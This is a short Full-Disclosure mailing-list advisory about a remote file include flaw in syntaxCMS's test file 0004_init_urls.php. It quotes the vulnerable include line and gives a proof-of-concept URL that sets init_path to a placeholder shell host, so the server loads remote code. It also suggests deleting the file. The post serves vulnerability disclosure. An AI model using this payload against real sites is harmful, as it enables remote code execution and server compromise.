[Full-disclosure] Remote File Include in syntaxCMS

Remote File Include in syntaxCMS

Vulnerable File:

0004_init_urls.php

Vulnerable Code:

1 <?php
2 include_once( $init_path . '/init.urls.php' );
3 ?>

PoC:

http://www.poweredbysyntaxcmssite.com/admin/testing/tests/0004_init_urls.php?init_path=http://YourShell?&amp;

Solution:

Remove This File…it's not needed…just used for tests

Found by MoHaJaLi

Greetz to Eddy_BAck0o

Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/